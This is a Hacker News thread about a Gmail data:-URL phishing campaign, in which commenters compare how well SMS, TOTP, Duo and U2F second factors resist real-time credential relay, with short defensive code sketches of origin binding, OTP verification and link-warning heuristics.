[–] colinbartlett link

Requiring 2-factor auth would prevent this from being exploitable, right? Probably impossible in a school environment but in an enterprise situation, more palatable perhaps.

reply

[–] gaia link

2FA would make it harder to exploit, but phishing attacks are getting fancier. They capture the 2FA code you enter and immediately start a session elsewhere with your password and 2FA code. Hardware 2FA with a security key (such as a Yubikey) is the only likely way to prevent phishing (excluding targets of state actors): https://support.google.com/accounts/answer/6103523?hl=en

reply

[–] fnl link

> They capture the 2FA code

How can that be done? That's between my phone and Google, so how can they "listen in" on that?

reply

[–] putlake link

The phishing site will ask you for your 2FA code and then enter it on the real Google login page.

reply

[–] smeehee link

Google can prompt you to confirm the login via your phone. It appears to work well: there's a time-out, and this time-out is also triggered if a second login attempt is made in parallel (and reaches the confirmation stage).

So… whichever login attempt gets to confirmation stage last wins (not relevant in this situation), and the confirmation screen on (at least) my phone does not indicate anything regarding location (which is highly relevant).

This looks a little weaker than TOTP (you're basically trading a little security for the convenience of not entering a code while keeping the second factor) and a lot weaker than U2F.

reply

[–] acchow link

Why would a yubikey prevent this? They can still send the 2FA code to Google to start your session...

reply

[–] jlebar link

No, they cannot with the U2F protocol (as implemented by yubikey).

The simplified version is, Google sends the browser a one-time nonce, which the browser forwards to the HW token to sign with its private key. Then the browser sends the signature back to the web server, which verifies it using its copy of the HW token's public key.

This would be vulnerable to MITM attacks, as you say.

So what the protocol actually does is concatenate the nonce sent by the web server with the origin of the web page as seen by the browser and have the HW token sign that. This way the server can verify that the HW token signed the right nonce for the right origin.

See https://docs.google.com/document/d/1SjCwdrFbVPG1tYavO5RsSD1Q..., search for "origin".
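
Roughly, in Python (a toy sketch of just the origin-binding idea, not the real U2F wire format; the cryptography package and every name here are illustrative):

    from cryptography.exceptions import InvalidSignature
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric import ec
    import os

    # Registration: the HW token generates a keypair, the server stores the public key.
    token_key = ec.generate_private_key(ec.SECP256R1())
    server_pubkey = token_key.public_key()

    def token_sign(nonce, origin_seen_by_browser):
        # The token signs nonce || origin, where the *browser* supplies the origin.
        return token_key.sign(nonce + origin_seen_by_browser.encode(),
                              ec.ECDSA(hashes.SHA256()))

    def server_verify(sig, nonce, expected_origin):
        try:
            server_pubkey.verify(sig, nonce + expected_origin.encode(),
                                 ec.ECDSA(hashes.SHA256()))
            return True
        except InvalidSignature:
            return False

    nonce = os.urandom(32)  # the server's one-time challenge

    # Honest login: the browser is on the real origin, so the signature verifies.
    assert server_verify(token_sign(nonce, "https://accounts.google.com"),
                         nonce, "https://accounts.google.com")

    # Phished login: the victim's browser is on the attacker's origin, so even a
    # faithfully relayed signature fails verification at the real server.
    assert not server_verify(token_sign(nonce, "https://evil.example"),
                             nonce, "https://accounts.google.com")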

reply

[–] acchow link

Oh I think I've never used this feature with my Yubikey - it's just been essentially an external keyboard that types rather quickly.

reply

[–] AlexCoventry link

It's only available on newer yubikeys.

reply

[–] jamescrowley link

It's a different protocol. Not an expert, but as I understand it U2F isn't totally out of band - the browser communicates the URL, so the token you give wouldn't be accepted by Google when it is replayed.

reply

[–] jamescrowley link

@extrapickles describes it better further down: https://news.ycombinator.com/item?id=13376402

reply

[–] shimon_e link

> Hardware 2FA, a security key, (such as a Yubikey) is the only likely way to prevent phishing

For now.

reply

[–] undefined link
[deleted]

reply

[–] semi-extrinsic link

Or manual challenge-response, like some internet banking tokens have.

reply

[–] Jarwain link

My school is actually rolling out optional 2-factor auth. I'm not a fan of the system they use^, but it's neat that a University is taking advantage of some security best practices.

^Instead of using "standard" 2-factor that generates a code on-the-fly within an app like GAuth or Authy, users receive a text message with 10 codes. The first digit of every code increases sequentially (0972, 1042, 2512, etc.), the codes must be used in that order (the 0 code on the first login, the 1 code on the second, etc.), and the page informs the user which number they're on.

reply

[–] jonoberheide link

Sorry to hear about your experience, Jarwain!

Duo offers a choice of authentication methods, depending on the usability and security requirements of your application or organization.

Duo Push is actually one of the easiest (and most secure) authentication methods, as one of the commenters pointed out:

https://www.youtube.com/watch?v=tPLxe9HUDjY

It might be worth pinging your IT/security dept to ask about enabling Duo Push as an option or to change the policy for SMS passcodes (e.g. you can have just one passcode sent instead of ten).

- Jon Oberheide, Co-Founder & CTO @ Duo

reply

[–] Bamberg link

Duo does work as advertised, and my uni uses it, but the privacy policy allows for a lot of personal data collection.

tldr: "Duo Security does not sell, rent, or trade and, except as described in this Privacy Policy, does not share any Personal Information with third parties for their promotional purposes." But Duo still collects A LOT of data on you.

From the policy: "Device-Specific Information: We also collect device-specific information (e.g. mobile and desktop) from you in order to provide the Services. Device-specific information includes:

attributes (e.g. hardware model, operating system, web browser version, as well as unique device identifiers and characteristics (such as, whether your device is “jailbroken,” whether you have a screen lock in place and whether your device has full disk encryption enabled)); connection information (e.g. name of your mobile operator or ISP, browser type, language and time zone, and mobile phone number); and device locations (e.g. internet protocol addresses and Wi-Fi). We may need to associate your device-specific information with your Personal Information on a periodic basis in order to confirm you as a user and to check the security on your device."

The policy continues to state that Duo may use this data for analytic/advertising purposes (although only in-house) as well as to comply with legal requests, subpoenas, NSLs etc.

Duo isn't collecting your data for nefarious purposes or to sell it to other companies, but they still are collecting A LOT of it. Other two-factor methods, like the ones used by Google and Facebook, allow clients to install their own code generators that don't collect personal data or even need access to the internet. Of course these methods don't have push requests that you can just approve rather than typing in the code.

reply

[–] tripzilch link

also, if it's a US company and it ever goes bankrupt/sells its assets, third party buyers aren't bound by any privacy policy whatsoever. yes, this is crazy and it means US privacy policies are basically meaningless; best just don't give them your data, but what can you do. personally I believe that collecting the data and pretending a privacy policy makes it okay is nefarious by itself already.

reply

[–] jonoberheide link

I think that's a fair read. The primary use of that data is for security use cases. E.g. if you're coming from an out-of-date browser or have risky Java/Flash plugin versions, we can notify you to update/remediate.

Another way to look at it: We collect security-relevant information on your device, but not your _personal_ data. In other words, we don't collect your email, photos, contacts, user-generated data, etc.

reply

[–] samch link

I'm at a large research university, and we use Duo across the institution. It really does work as advertised. The Duo Push feature combined with my iPhone's TouchID is very convenient (Duo Push also works on other devices).

Most importantly to me, though, the system has thus far been completely reliable. I haven't yet heard of a single case where somebody couldn't log in because of Duo. I'm not sure what our enterprise agreement is / how much this all costs, but it's a very good system for us.

reply

[–] paulmd link

cc: @jonoberheide

My Duo hardware token (the code generator with the button and the LCD) tends to "desynchronize" after long periods where you don't use it. The internal clock gets off, so it drifts in what token it returns vs what the server thinks it should be returning, and then it stops working.

Normally, if you log in on a regular basis the server corrects for this drift. There is probably a sliding window of N valid keys (say 10) and using one of them tells the server what the internal clock state is. But if you don't use it for a long time (more than 30 days in my experience), the clock drifts, you start going outside the window and it refuses to let you log in.

If your IT desk is open, they can "resync" it by typing in a couple numbers in a row, which lets the server scan the key sequence and find where your token is.

Use-case: We don't have Duo tokens rolled out system-wide, they are only issued for admin tasks and we have separate admin accounts for these with the Duo attached. I'm an "occasional sysadmin" who administrates several stable servers that mostly don't need to be touched.

As I don't need to use it day-to-day, my key desynchronizes quite often; I have had it happen at least 3 times. It would be bad if I had an after-hours emergency with my Duo token; I do not trust it. The hardware tokens are not reliable, in my book.

edit: The fix for me would be for the token to automatically resynchronize on the fly. Just like the IT guys can do, but over-the-wire. If the server sees (f.ex) three sequential login attempts with valid-but-stale keys, with the proper order and timing pattern, then it accepts them and resynchronizes the key window.

To prevent replay attacks, you would also need to add a constraint that the keys be newer than the ones last used for a successful login, but it should be doable. You would also want to avoid causing an account lockout as you type in the invalid keys.
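
Sketched in Python, the auto-resync might look like this (assuming an HOTP-style event counter per RFC 4226; whether Duo's tokens are event- or time-based is a guess on my part, and the secret and window sizes are made up):

    import hashlib, hmac, struct

    SECRET = b"provisioned-token-secret"  # hypothetical shared secret
    WINDOW = 10          # codes ahead of the stored counter accepted normally
    RESYNC_SCAN = 1000   # how far ahead the server scans during a resync

    def hotp(counter, digits=6):
        # RFC 4226 dynamic truncation of HMAC-SHA1(secret, counter).
        mac = hmac.new(SECRET, struct.pack(">Q", counter), hashlib.sha1).digest()
        offset = mac[-1] & 0x0F
        code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
        return str(code % 10 ** digits).zfill(digits)

    def verify(server_counter, code):
        # Normal login: accept any code inside the look-ahead window.
        for c in range(server_counter + 1, server_counter + 1 + WINDOW):
            if hmac.compare_digest(hotp(c), code):
                return c  # the server's counter jumps forward to here
        return None

    def resync(server_counter, code1, code2, code3):
        # Three *consecutive* codes pin down a counter that has drifted far
        # outside the normal window, with no help desk involved. The counter
        # then moves past all three codes, so they cannot be replayed.
        for c in range(server_counter + 1, server_counter + RESYNC_SCAN):
            if (hmac.compare_digest(hotp(c), code1)
                    and hmac.compare_digest(hotp(c + 1), code2)
                    and hmac.compare_digest(hotp(c + 2), code3)):
                return c + 2
        return None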

reply

[–] jonoberheide link

Hi Paul! I believe your token should automatically resync if you enter three consecutive correct passcodes that are outside (but forward of) the current valid window.

reply

[–] Jarwain link

Huh, I never would've expected to hear from the CTO just from making this post.

Thanks for the reply! I'll definitely get in contact with the school's OIT to figure out alternate options for authentication

reply

[–] jonoberheide link

No prob! I can't claim to be a HN veteran (/me glares at @tqbf), but if I hear people are having issues, happy to help.

reply

[–] Jarwain link

So it turns out I can still use the Duo Mobile app. I have to re-add the device. Not the most intuitive but then again I figured it out on my own -shrugs-

reply

[–] bkoehler link

I was a huge fan and evangelist of Duo up until the Duo Mobile 3.15.0 update on December 13, 2016, which disabled the ability to approve Duo Push from a locked phone (lock screen, Android Wear). That change was horribly communicated and has been inadequately defended when challenged, and it has shaken my faith in Duo.

reply

[–] voidlogic link

Can Duo be used with Google Authenticator or do you have to use "Duo Push"?

reply

[–] Jarwain link

Cannot use Google Authenticator. Can't even use Duo Push; this is the SMS functionality.

I do plan on getting in contact with the school's OIT about enabling alternatives.

reply

[–] intrasight link

I hadn't heard of Duo. Just looked briefly at the site. Does anyone have a TL;DR on that? Why would one use that rather than the native 2FA?

reply

[–] Bamberg link

They can send push requests that you can just approve on your mobile device, no typing in those codes. They also have backup methods that work w/o needing internet access on your phone.

I think institutions also use Duo because Duo takes care of the whole thing, whereas traditional 2FA isn't trivial to implement for the institution (generating tokens and all of that). At least that's what I was told by my institution when they made us start using Duo.

reply

[–] intrasight link

> takes care of the whole thing

But I would have assumed that there is considerable work necessary on the backend for a web server to integrate with Duo.

reply

[–] oxguy3 link

Oh my god that's awful, what's the point of making it so counterintuitive?? I'll never understand the motivation of companies that roll their own 2FA instead of just using TOTP or Authy.

reply

[–] Jarwain link

It was probably the worst way they could have implemented 2FA; we're still vulnerable to a MITM attack.

One of the more annoying things is that the codes are sent from a random 386 number. Out of the 7+ texts I've received thus far, only 2 were from the same number.

Apparently the company they're using is named https://duo.com/

reply

[–] grivescorbett link

That's odd, we use duo at work and it's great. Every user is configured to get a push notification directly to the device which bypasses the issues with SMS.

reply

[–] Jarwain link

That requires the user to use the Duo app though, right?

I don't recall whether I had the option to use the app when I enabled MFA initially. However, after the fact, and as far as I can find, I cannot go back and enable the app.

reply

[–] grivescorbett link

That's correct, of course without having the app installed there is no option other than SMS or a hardware token.

I remember that configuring this is tricky, but I did eventually get user self enrollment configured with push being the default. Happy to dig more into my config, if you're curious: gabe@untapt.com

reply

[–] Jarwain link

Totally curious, unfortunately it'd probably go in one eye and out the other since I'm not involved in the Uni's implementation.

reply

[–] nerdponx link

Huh, I've heard good things about Duo. They're not a nobody at any rate.

reply

[–] hobarrera link

We have security experts developing 2fa techniques, and then we have these sorts of people.

reply

[–] Latty link

I assume some misguided soul got told that they needed to reduce the number of texts sent to save costs, but that's horrible.

SMS for 2fa is poor to begin with. I wish people would at least implement the standard TOTP/HOTP option as well if they are going to pull stuff like that.

reply

[–] kibwen link

My university uses the same system as yours, and what's worse is that in order to install their custom 2FA app on Android you have to configure your phone to allow apps from unknown sources. So I have to choose between using SMS codes that can be intercepted or letting an entirely unvetted app run amok on my phone.

reply

[–] feld link

This is the most unintuitive approach to 2FA I've ever seen

reply

[–] striking link

That's a pretty awful method of securing anything.

Like, that would prevent me from using 2FA.

Whatever happened to standards?

reply

[–] undefined link
[deleted]

reply

[–] Jarwain link

I guess someone wanted to make a new standard (https://xkcd.com/927/)

reply

[–] dankohn1 link

No. A man-in-the-middle phishing attack can ask you for your second factor and pass it through to Gmail.

reply

[–] acdha link

This is definitely true of TOTP but U2F was designed to prevent phishing attacks by incorporating the hostname in the protocol[1], which means the attacker needs to successfully compromise SSL as well.

1. https://security.stackexchange.com/questions/71316/how-secur...

reply

[–] wopwopwop link

Very clever, thanks for sharing.

However I wouldn't want my second factor to be attached to my browser. Seems way too volatile for me. Personally I'd rather keep TOTP and be vulnerable to time-of-use phishing.

Maybe if the browser had an OS API that a YubiKey could query...

reply

[–] acdha link

Just to expand on what jon-wood said, that's definitely the other way around: U2F is an open standard and the intelligence lives on the USB/NFC device. Any browser which implements that standard[1] can log in and, especially nice for security, the browser never gets access to the keys or, with devices like the YubiKeys which require you to touch a button for each request, even the ability to authenticate without user approval.

1. Currently Chrome has this, Firefox is close (50.1 shipped it but it only works in the e10s mode), and there are extensions for Safari and older versions of Firefox.

reply

[–] wopwopwop link

sigh read my response to the other guy

reply

[–] jon-wood link

It's actually the other way round, the YubiKey (or other U2F token) has an API the browser queries, generally triggering the token requesting some sort of physical interaction.

reply

[–] wopwopwop link

I know how it is now, but that's not what I'm talking about. Currently the URL is not included in the hash, that's my point. It could be by having those two talk to each other. Who's the server and who's the client is beside my point.

reply

[–] Ajedi32 link

Huh? What are you even talking about? This comment makes no sense to me in the context of what jon-wood said.

> the URL is not included in the hash

What hash? Nobody even mentioned a hash. The crypto keys used for U2F are indeed domain-specific, if that's what you're trying to ask.

> It could be by having those two talk to each other.

Who's "those two"? And what's "it"? I'm very confused.

reply

[–] wopwopwop link

> What hash? Nobody even mentioned a hash.

I mentioned a hash. The secret is hashed together with the time. _That_ hash.

> The crypto keys used for U2F are indeed domain-specific, if that's what you're trying to ask.

I know the secret is domain-specific. What I was describing is taking the secret, and the time AND THE DOMAIN, and using them to produce the hash. This would break MITM. One of the comments above me mentioned this and I ran with it. But you're talking to me like you didn't read anything above....

> Who's "those two"?

Those two are the yubikey and the browser.

reply

[–] Ajedi32 link

> I mentioned a hash.

I think you're confused. You have not mentioned the word "hash" even once in this thread prior to the previous comment I replied to.

Anyway, I think you're confusing U2F with TOTP. U2F does not rely on the time at all AFAIK; it uses public key cryptography, and authenticates by signing a data structure containing the domain name of the site and a server-provided nonce (among other things).

> What I was describing is taking the secret, and the time AND THE DOMAIN and use them to produce the hash.

I think there's still some sort of disconnect here, because up until this comment you've described nothing of the sort in this thread. Could you link the comment you're referring to where you explained all this?

> One of the comments above me mentioned this and I run with it.

If you're referring to acdha's comment about U2F, as acdha and others in this thread have explained, U2F (aka Universal 2nd Factor) is an entirely different protocol from TOTP (aka Time-based One Time Password). U2F does not use hashing or the system time in the way you seem to be envisioning, but it is also not vulnerable to phishing like TOTP is.

U2F interfaces with your browser, and uses a set of public and private keys (that is stored on the U2F device, not in your browser) to authenticate to sites in a way which can't be phished. It's not theoretical; it exists and can be used today with many popular sites, including Google, GitHub, Dropbox, and more. You just need a USB device which supports U2F (YubiKey is one, but there are many others).

reply

[–] acdha link

I think most of us are having trouble understanding exactly the question which you're trying to ask – could you try to state it clearly and precisely?

reply

[–] midgetjones link

That's assuming the attacker could log in with it before it expired, isn't it?

reply

[–] danieldk link

Yes, but as per the standard TOTP codes are valid for a window of 1 minute.

TOTP barely protects against phishing. What you want is a U2F key as the second factor. It's not like they are expensive anyway (usually 7-15 Euro) and quite a few large services support U2F tokens already (Google, Dropbox, GitHub, Fastmail, etc.).

reply

[–] midgetjones link

Thanks!

Is the 1 minute window always the case? In the authenticator app, it seems like codes expire after ~30 seconds. If I wait till the last few seconds before using the code, does that make me any safer?

reply

[–] garrettr_ link

If the codes are time-based (TOTP), they are typically generated with a rolling window of 30 seconds (as you saw in Google Authenticator). The 30s rolling window is the recommended (and widely implemented) default value from the TOTP RFC [0].

It is common but not universal for sites to accept, at a given time, 1) the current TOTP code, 2) the code from the previous window, 3) the code for the next window. This is done as a partial mitigation for potential clock skew issues on the client that's generating the TOTP codes (e.g. your phone). In practice this means every code is valid for 1m30s, although sites may customize this (with or without changing the window size, which is typically not done because that parameter must be consistent system-wide).
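
For concreteness, here is a minimal TOTP check with that plus/minus one step allowance (Python stdlib only; the shared secret is of course hypothetical):

    import hashlib, hmac, struct, time

    SECRET = b"shared-totp-secret"  # hypothetical provisioned secret
    STEP = 30  # the RFC's recommended time-step size, in seconds

    def totp(for_time, digits=6):
        counter = int(for_time) // STEP
        mac = hmac.new(SECRET, struct.pack(">Q", counter), hashlib.sha1).digest()
        offset = mac[-1] & 0x0F
        code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
        return str(code % 10 ** digits).zfill(digits)

    def verify(code, now=None):
        now = time.time() if now is None else now
        # Accept the previous, current and next steps: roughly 90s of validity,
        # which is more than enough time for a real-time phishing relay.
        return any(hmac.compare_digest(totp(now + drift * STEP), code)
                   for drift in (-1, 0, 1))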

> If I wait till the last few seconds before using the code, does that make me any safer?

Maybe, but this is not practicable security advice. The latency of a MITM attack on a 2-factor TOTP login depends on the attack infrastructure and design, but can easily be made to be on the order of tens or hundreds of milliseconds. Reducing the window seems like it might help your security, but it can never be perfect, and there is a direct tradeoff with usability because users need time to look up the codes on one device and enter them on another.

Folks often say "enable 2FA" in response to news of new and sophisticated phishing attack campaigns, but it's critical to note that most commonly deployed 2FA (TOTP, HOTP, SMS) is trivially phish-able. 2FA is not an automatic defense against phishing, although some newer designs achieve this and were created specifically with this goal in mind: U2F is a good example.

[0]: https://tools.ietf.org/html/rfc6238

reply

[–] danieldk link

The RFC recommends a time step of 30 seconds + permitting at most one previous time step for handling out of sync clocks and slow/late entry:

The validation system should compare OTPs not only with the receiving timestamp but also the past timestamps that are within the transmission delay. A larger acceptable delay window would expose a larger window for attacks. We RECOMMEND that at most one time step is allowed as the network delay.

[...]

We RECOMMEND a default time-step size of 30 seconds. This default value of 30 seconds is selected as a balance between security and usability.

Since the client's clock could be behind or ahead of the server's clock, I have to correct myself: the window would be 90 seconds.

One could be a bit stricter and e.g. accept the previous time step only until halfway through the current time step, which would bring the window back to 60 seconds.

At any rate, all these timeframes are far too large to avoid real-time phishing attacks.

reply

[–] jpalomaki link

In some cases the server is configured to accept multiple codes (prev, current, next) to handle timesync issues between server and client (where the app is running).

reply

[–] wopwopwop link

No. How long does it take from you entering the code to the code reaching Google? A few tens of milliseconds? With a phisher in the middle it's a couple extra milliseconds.

reply

[–] Niten link

U2F would prevent this from being exploitable, but one-time password schemes like TOTP would not.

reply

[–] RedPanda250 link

Why would TOTP not suffice to prevent this exploit?

reply

[–] extrapickles link

They can use the TOTP token to auth themselves, whereas U2F will not work if you are the middle-man.

U2F basically[0] signs the current URI and HTTPS key and sends it back. If there is a man-in-the-middle then the signatures will not match and the auth will fail.

[0]: https://developers.yubico.com/U2F/Protocol_details/Overview....

reply

[–] IanCal link

I don't think so, I'm not sure how it could.

One of the tweets points out that something like LastPass would help with this, as it wouldn't allow you to autofill your password (since it's not on the Google domain), but then you could get it manually from there anyway.

reply

[–] danielbarla link

Well, when the attacker attempts to log in via the stolen credentials, they would get the 2FA check, and you would get an SMS.

Normally this would alert you to the fact that someone is logging in to your account, and would stop the attacker since they lack the 2FA one time pass. In this case though, since you've already fallen for the "I'm trying to log in to Google again", the attacker will probably fake the 2FA screen as well, and you'll merrily type it in.

reply

[–] michaelt link

1. You visit the attacker's page and give them your username and password.

2. The attacker immediately tries them, triggering an SMS to you and an 'enter SMS code' page for them.

3. The attacker shows the 'enter SMS code' page to you, and you enter the code from the SMS you just received, giving it to the attacker.

4. The attacker completes their login using the SMS code.

5. The attacker shows the user some believable error message (implying an error on Google's end, or a typo in the SMS code) then forwards the user to the legitimate Google login page.

reply

[–] danielbarla link

Yep, that's what I'm saying too. If you've fallen for providing 1FA, you'll fall for 2FA too, since you think it's legit.

reply

[–] mikeash link

Apple's 2FA for iCloud will likely avoid this if you're careful. They do a GeoIP lookup of where the request is coming from and show the approximate location of the login attempt before they show you the 2FA code. For example, when logging in legitimately from home, it'll say that there's a login attempt from the city where I live. In the likely case where the phisher's server isn't in this area, it'll show something else, and I'll know what's up.

Obviously this isn't perfect because it depends on people actually paying attention to that, and on not having too many false positives due to GeoIP failures, but it seems like a nice improvement.

Apple has a nice UI on it (no surprise, I'm sure) where they show a map centered on the location in question, but even SMS-based solutions could include a quick "Login attempt from City" along with the code.
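
Sketched in Python, the SMS variant might look like this (the geoip2 package, the GeoLite2 database file and the message format are all illustrative, not anything Apple or Google actually runs):

    import geoip2.database  # pip install geoip2; free GeoLite2 DB from MaxMind

    reader = geoip2.database.Reader("GeoLite2-City.mmdb")

    def sms_text(code, login_ip):
        # Coarse city-level lookup; GeoIP can be wrong, so phrase it softly.
        city = reader.city(login_ip).city.name or "an unknown location"
        return "Login attempt near {}. Your code is {}.".format(city, code)

A phisher relaying your credentials from elsewhere would trip the location hint, at least when GeoIP gets it right.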

reply

[–] cyberferret link

Apple's 2FA is good, but their geo-location needs some work. I constantly get notifications that someone located 3000km away from me is trying to log in whenever I perform a 2FA sign on.

It's enough to concern me on the odd occasion that someone is trying a MITM attack.

I am guessing it is because in Australia, quite often the central server allocating IP addresses for our major ISPs can be in a completely different city?!?

reply

[–] mikeash link

That's too bad. Do other services get it right?

reply

[–] undefined link
[deleted]

reply

[–] IanCal link

I was thinking this would be done automatically. You enter username and password, they send them to Google and get a 2FA request. They show you the same screen and ask for your 2FA pass, which they then send on, and they're in.

Someone else mentioned U2F would work though as that's tied to the domain, but I don't really know much about that.

reply

[–] tscs37 link

Autofill should usually pull the user out of their tunnel vision and focus them on the site and what they are doing.

Not perfect but at least they're not blindly typing in passwords.

reply

[–] hobarrera link

Probably not; the fake page can also prompt for the second factor and then quickly do the real authentication using that.

reply

[–] jdavis703 link

This is why having a warning for non-HTTPS sites is so important: http://boingboing.net/2016/11/05/chrome-is-about-to-start-wa....

reply

[–] hobarrera link

Yup, hopefully that would make a difference, though if we keep getting news like today's GoDaddy validation bug, this'll gradually lose value. :(

reply

[–] anchpop link

I don't see how that would help here. Couldn't the phishing site have HTTPS?

reply

[–] jimmaswell link

I feel like all these kinds of extra security burdens aren't worth it. If you could quantify and add up all the inconvenience caused by extra security beyond simple password logins, affecting all users always, it would surely outweigh the harm caused by the attacks it prevents, which temporarily affect a few users.

reply

[–] jdavis703 link

What if they're able to compromise a person who works in HR, who probably has copies of passports, social security numbers and other highly-sensitive PII in their email inbox? The fact is people send around all kinds of sensitive information via email, including IT/engineering, who probably have discussions about various security holes they're working on patching.

reply

[–] wopwopwop link

Not really. The phisher can just ask for the second factor the same way they ask for the password.

reply

[–] angrygoat link

U2F knocks this on the head - a MITM site won't have the secret required to generate the token.

reply

[–] wopwopwop link

Wrong. The target domain asks the MITM for the secret, the MITM asks the victim for the secret, the victim gives the secret to the MITM and the MITM gives the secret to the target domain. Just like with the password.

You have no idea what you're talking about and yet you downvote first and ask questions later.

reply

[–] camtarn link

Holy crap. That is some serious ingenuity and skill being applied to the cause of evil.

reply

[–] drzaiusapelord link

>They were using bit.ly to obscure the address (in Russia).

Clicking on links from email is such an edge case it's bewildering we allow any link to be routable from an email client. I'd love to see my email client block this stuff by default. There's no case for me where an email should lead me to Russia, be it via a shortener or not. Or to an IP address that is on any honeypot list or has a suspicious rating.

I think we need to rethink what is allowed to route out of emails. I can see a whitelist of legitimate and vetted companies with large warnings for anything else. A little AI would go a long way here. Maybe visit the domain, verify the site has SSL, verify it's not in another country, verify it's not trying to impersonate sites, check reputation lists, etc. A handful of predictive rules put into a browser or email client would greatly help here.
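
As a sketch of what such rules could look like (the lists and heuristics here are invented for illustration; a real client would use curated reputation feeds):

    from urllib.parse import urlparse

    SHORTENERS = {"bit.ly", "goo.gl", "t.co", "tinyurl.com"}  # example list
    PROTECTED_BRANDS = {"google", "paypal", "apple"}          # example list

    def link_warnings(url):
        warnings = []
        parts = urlparse(url)
        host = (parts.hostname or "").lower()
        if parts.scheme == "data":
            warnings.append("data: URI posing as a page")
        elif parts.scheme != "https":
            warnings.append("not HTTPS")
        if host in SHORTENERS:
            warnings.append("shortener hides the destination")
        if host.replace(".", "").isdigit():
            warnings.append("raw IP address")
        for brand in PROTECTED_BRANDS:
            # Crude impersonation check: brand name inside a non-brand domain.
            if brand in host and not host.endswith(brand + ".com"):
                warnings.append("possible " + brand + " impersonation")
        return warnings

    print(link_warnings("http://bit.ly/2abcdef"))
    # -> ['not HTTPS', 'shortener hides the destination']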

It's clear we can't spot phishing attempts well, but we may be able to make actually visiting the phishing site as difficult as possible. Links in emails should be seen as extremely hostile by default.

reply

[–] jhardcastle link

Sysadmin at a school: we use GMail for our students and faculty, and we got hit by this hard right before the holiday break. Three employees and a handful of students all got hit by the attack within a two hour period. It's the most sophisticated attack I've seen. The attackers log in to your account immediately once they get the credentials, and they use one of your actual attachments, along with one of your actual subject lines, and send it to people in your contact list.

For example, they went into one student's account, pulled an attachment with an athletic team practice schedule, generated the screenshot, and then paired that with a subject line that was tangentially related, and emailed it to the other members of the athletic team.

They were using bit.ly to obscure the address (in Russia). We had to take our whole mail system down for a few hours while we cleaned it up.

reply

[–] IshKebab link

Ah the classic "ugh. we don't want to have to fix this, so here are some bullshit technical reasons why it's impossible and a bad idea".

reply

[–] elastic_church link

yeah but we all do this every day to the designers

reply

[–] undefined link
[deleted]

reply

[–] undefined link
[deleted]

reply

[–] IanCal link

I'd say the data: url part is important, as it lets you construct much more plausible looking contents for the address bar. The standard "check it's google.com" would probably fail for a lot of people.

How many people really know that you can put a whole webpage in the URL?

reply

[–] timruffles link

Agreed - I think simply highlighting the data:... part of the URL with a vaguely scary colour would help.

reply

[–] mayoff link

Apple's approach in Safari is to only show the hostname in the address bar, unless the address bar has focus. This works pretty well in general (for non-power-users). Unfortunately, for a data URL, it just shows as much of the URL as fits. This may well include the phony “https://accounts.google.com” part of the URL and thus still mislead naive users.
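
You can see the problem directly: a data: URL simply has no hostname for the browser to display (Python stdlib, purely for illustration):

    from urllib.parse import urlparse

    real = urlparse("https://accounts.google.com/ServiceLogin")
    print(real.scheme, real.hostname)    # https accounts.google.com

    phish = urlparse("data:text/html,https://accounts.google.com/<script>...")
    print(phish.scheme, phish.hostname)  # data None

So a hostname-only bar has nothing safe to fall back on, and ends up showing the part of the URL the attacker controls.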

reply

[–] eridius link

At the very least it'll still look different, which might hopefully make the user take a closer look. For example, for normal URLs, you never see the https:// part (unless the address bar has focus). Even if you enable the advanced preference to show the full website address again, it still hides the https:// part.

reply

[–] jneal link

This is pretty scary. When you hear security professionals explain to laymen how to identify phishing attacks, it's almost always check the URL, make sure you're actually at google.com and not go0gle.com, or something like that.

I can't even imagine what legitimate use there is to placing an entire HTML document into the URL. Just seems like a hack someone came up with as a solution to a problem, not the right solution, but a solution nonetheless.

reply

[–] contravariant link

>I can't even imagine what legitimate use there is to placing an entire HTML document into the URL. Just seems like a hack someone came up with as a solution to a problem, not the right solution, but a solution nonetheless.

It allows you to embed data in a URL, meaning you can link to documents that aren't necessarily stored anywhere, such as generated images/text.

I suppose you could make an argument that it shouldn't be shown as a regular URL.

reply

[–] Jarwain link

Why even render the content of data:text/html in the first place?

reply

[–] soundwave106 link

To give an example, I've seen some multiplayer games with dynamic content, that use Websockets for communication with the server and update various information via data URIs. I've never seen a text/html data URI yet (mostly image transmission to be honest) but for a multi-client Websockets type application I definitely wouldn't rule out that sort of thing.

I agree that blocking the rendering of data:text/html (and any other MIME type that could be used maliciously) from the address bar is a good idea. I can't think of a valid use case for that scenario. It seems like similar attack vectors have been known for some time (https://nakedsecurity.sophos.com/2012/08/31/phishing-without...).

reply

[–] contravariant link

Because that's precisely what the 'data:' URI is supposed to do. The URI is only a description of some resource, there's no reason one description should be treated differently than any other, unless it's actually pointing to a different resource.

reply

[–] Jarwain link

It's more that rendering the HTML code in this fashion does not make sense to me. Maybe print the code to the page instead of rendering it. Anything would be better than rendering the code; I can't even come up with a possible use case for that functionality, can you?

reply

[–] contravariant link

You could generate a webpage and link to it without needing to host it somewhere.

At any rate, if you allow a URI scheme that embeds the data in the URI itself it'd be very odd to arbitrarily restrict the valid MIME types. It'd be like forbidding a http URL from linking to a JPEG.

reply

[–] Jarwain link

Well in a way you're just offloading the cost of hosting that code/data in that case. Instead of hosting it yourself, the page with the link is hosting that webpage.

Well it wouldn't really be arbitrary, it'd be specifically HTML and/or JS, for security related purposes.

reply

[–] space_fountain link

Not to mention don't blobs allow us to do this now anyway?

reply

[–] e40 link

> make sure you're actually at google.com and not go0gle.com

And how about the domain with a character that looks more like 'o' than '0'? There was something on HN recently about that. The example given would have completely fooled me, since it looked the same as the real domain.

reply

[–] seanp2k2 link

https://en.m.wikipedia.org/wiki/IDN_homograph_attack is what you're referencing, I believe :)

reply

[–] Magicstatic link

Interestingly enough, HN itself was actually susceptible to this and it was reported by a security researcher:

https://news.ycombinator.com/security.html

reply

[–] Jarwain link

Why is data:text/html even valid or rendered to the page in the first place? I'm having trouble coming up with a valid usecase for this

reply

[–] grenoire link

It's just not treated as an exception. Works for all MIME types supported by the browser.

reply

[–] babyrainbow link

Why not just alert the user if the address bar contains something weird like this...

And also, why not do something like this, even: let the browser save screenshots of some user-selected sites, like the mail login page, online banking login page, etc., and have them map to a trusted URL.

After loading a page, the browser could screenshot it and use some ML magic to compare it to the stored screenshots (I mean, there are things today that can call out the names of the things in an image and even tell what they are doing, right?). When one of them matches and the URL of the current page differs from the trusted URL, the user should be alerted. Something like "Hey user, this page suspiciously looks like this page that we stored, but the url is completely different. Are you sure about this?"
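
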